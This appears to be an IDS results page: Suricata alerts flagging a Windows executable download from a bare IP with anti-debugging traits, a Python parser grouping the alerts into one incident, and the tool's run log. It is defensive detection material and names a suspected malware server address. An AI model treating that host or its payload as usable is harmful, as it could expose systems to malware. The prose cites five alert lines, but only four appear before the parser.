04/30/2019-02:29:52.179783  [**] [1:2019714:10] ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.175:49192 -> 188.166.74.218:80
04/30/2019-02:29:52.196943  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 188.166.74.218:80 -> 192.168.100.175:49192
04/30/2019-02:29:52.196943  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 188.166.74.218:80 -> 192.168.100.175:49192
04/30/2019-02:29:54.956067  [**] [1:2015744:4] ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) [**] [Classification: Misc activity] [Priority: 3] {TCP} 188.166.74.218:80 -> 192.168.100.175:49192
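All five alerts belong to one TCP connection, 192.168.100.175:49192 to 188.166.74.218:80: the request-side rules (2016141, 2019714) fire on the GET for a terse executable name from a dotted-quad host, the response-side rules (2018959, 2021076) fire on the MZ header coming back, and 2015744 fires on an `IsDebuggerPresent` import inside the body a few seconds later. Collapsing such a burst into one per-connection incident, with the internal host, the external host, the worst priority and the distinct SIDs, is the first step of triage. The parser below is an added example, not part of the page, of Suricata or of IDSDeathBlossom; the sample log is the five fast.log lines above, embedded so the script runs offline, and using RFC 1918 address space (`ipaddress.is_private`) to tell the victim from the server is an assumed heuristic.

```python
"""Parse Suricata fast.log lines and collapse them into per-connection incidents.

Added example, not part of the page or of Suricata.  Handles the fast.log
layout shown above:
  <ts>  [**] [gid:sid:rev] <msg> [**] [Classification: <c>] [Priority: <p>] {PROTO} src:port -> dst:port
"""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, NamedTuple, Optional, Tuple

# Constructed sample: the five alert lines shown on this page, embedded so the
# example runs offline.
SAMPLE_FAST_LOG = """\
04/30/2019-02:29:52.179783  [**] [1:2016141:5] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.100.175:49192 -> 188.166.74.218:80
04/30/2019-02:29:52.179783  [**] [1:2019714:10] ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.175:49192 -> 188.166.74.218:80
04/30/2019-02:29:52.196943  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 188.166.74.218:80 -> 192.168.100.175:49192
04/30/2019-02:29:52.196943  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 188.166.74.218:80 -> 192.168.100.175:49192
04/30/2019-02:29:54.956067  [**] [1:2015744:4] ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) [**] [Classification: Misc activity] [Priority: 3] {TCP} 188.166.74.218:80 -> 192.168.100.175:49192
"""

# The Classification block is optional (rules without a classtype omit it).
# Endpoints are captured whole and split afterwards, because ICMP lines carry
# no port and IPv6 addresses contain colons themselves.
FAST_RE = re.compile(
    r"^(?P<ts>\d{2}/\d{2}/\d{4}-\d{2}:\d{2}:\d{2}\.\d{6})\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s*(?P<cls>[^\]]*)\]\s+)?"
    r"\[Priority:\s*(?P<prio>\d+)\]\s+\{(?P<proto>[^}]+)\}\s+"
    r"(?P<src>\S+)\s+->\s+(?P<dst>\S+)\s*$"
)


class Alert(NamedTuple):
    ts: datetime
    gid: int
    sid: int
    rev: int
    msg: str
    classification: str
    priority: int          # 1 is the most severe in Suricata's scheme
    proto: str
    src: str
    sport: Optional[int]
    dst: str
    dport: Optional[int]


def _split_endpoint(ep: str, proto: str) -> Tuple[str, Optional[int]]:
    """'ip:port' -> (ip, port) for port-carrying protocols; rsplit keeps IPv6 intact."""
    if proto.upper() in ("TCP", "UDP", "SCTP") and ":" in ep:
        host, port = ep.rsplit(":", 1)
        return host, int(port)
    return ep, None


def parse_fast_log(text: str) -> List[Alert]:
    alerts: List[Alert] = []
    for line in text.splitlines():
        m = FAST_RE.match(line)
        if not m:
            continue   # blank line or a format this parser does not know
        src, sport = _split_endpoint(m["src"], m["proto"])
        dst, dport = _split_endpoint(m["dst"], m["proto"])
        alerts.append(Alert(
            datetime.strptime(m["ts"], "%m/%d/%Y-%H:%M:%S.%f"),
            int(m["gid"]), int(m["sid"]), int(m["rev"]), m["msg"],
            m["cls"] or "", int(m["prio"]), m["proto"], src, sport, dst, dport))
    return alerts


def connection_key(a: Alert):
    """Direction-agnostic key so request- and response-side alerts land together."""
    ends = sorted([(a.src, a.sport or 0), (a.dst, a.dport or 0)])
    return (a.proto, ends[0], ends[1])


def summarize(alerts: List[Alert]) -> List[Dict]:
    """One incident record per connection.  Internal vs external uses RFC 1918
    private address space, an assumption that fits the capture above."""
    groups: Dict[tuple, List[Alert]] = defaultdict(list)
    for a in alerts:
        groups[connection_key(a)].append(a)
    out = []
    for key, group in groups.items():
        hosts = {key[1][0], key[2][0]}
        stamps = [a.ts for a in group]
        out.append({
            "proto": key[0],
            "internal": sorted(h for h in hosts if ipaddress.ip_address(h).is_private),
            "external": sorted(h for h in hosts if not ipaddress.ip_address(h).is_private),
            "top_priority": min(a.priority for a in group),
            "sids": sorted({a.sid for a in group}),
            "span_seconds": round((max(stamps) - min(stamps)).total_seconds(), 3),
            "alerts": len(group),
        })
    return out


if __name__ == "__main__":
    for incident in summarize(parse_fast_log(SAMPLE_FAST_LOG)):
        print(incident)
```

For the capture above this yields a single incident: internal host 192.168.100.175, external host 188.166.74.218, priority 1, five alerts over about 2.8 seconds. The distinct SID list is also what you would feed into a `threshold.config` review, since four of the five rules here are INFO/POLICY signatures that fire on every executable download from a bare IP and are candidates for rate limiting rather than suppression.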


IDSDeathBlossom.py.log - (1176 bytes)
2019-05-01 14:35:18,302 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-05-01 14:35:19,036 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-05-01 14:35:19,036 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-05-01 14:35:19,037 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-05-01 14:35:19,037 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-05-01 14:35:19,037 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/62429eda87eaf55ba4e1b45d7bcd1db956b33745cb75ec8c950e11a498e082d2 -r /var/pcap/05012019.1435-a02ab19f-2fe3-43b9-a4f2-6c4549ccee72.pcap -vvv -k none
2019-05-01 14:35:42,264 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-05-01 14:35:42,264 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 23.9734280109